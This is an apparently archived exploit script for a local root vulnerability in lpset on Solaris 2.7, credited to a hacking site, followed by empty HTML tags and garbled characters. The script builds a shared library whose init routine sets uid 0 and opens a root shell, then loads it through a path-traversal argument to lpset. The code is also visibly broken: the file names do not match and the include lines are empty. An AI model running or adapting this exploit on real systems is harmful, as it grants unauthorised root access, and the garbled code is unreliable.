#!/bin/sh # # /usr/bin/lpset vulnerability in Solaris/SPARC 2.7 # script by noir@gsu.linux.org.tr # # lpset seems to use strcat to append paths (-r) # but there is a special case /usr/lib/print/lib has to be present # cat > foo.c << EOF #include #include void _init(void) { setuid(0); system("/bin/sh"); } EOF echo "Compiling ..." gcc -fPIC -c noir.c -g -DSOLARIS -Wall ld -G -o noir.so noir.o -ldl chmod 755 noir.so rm -f noir.c rm -f noir.o /usr/bin/lpset -n xfn -r /../../../..$PWD/noir noir # www.hack.co.za #
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß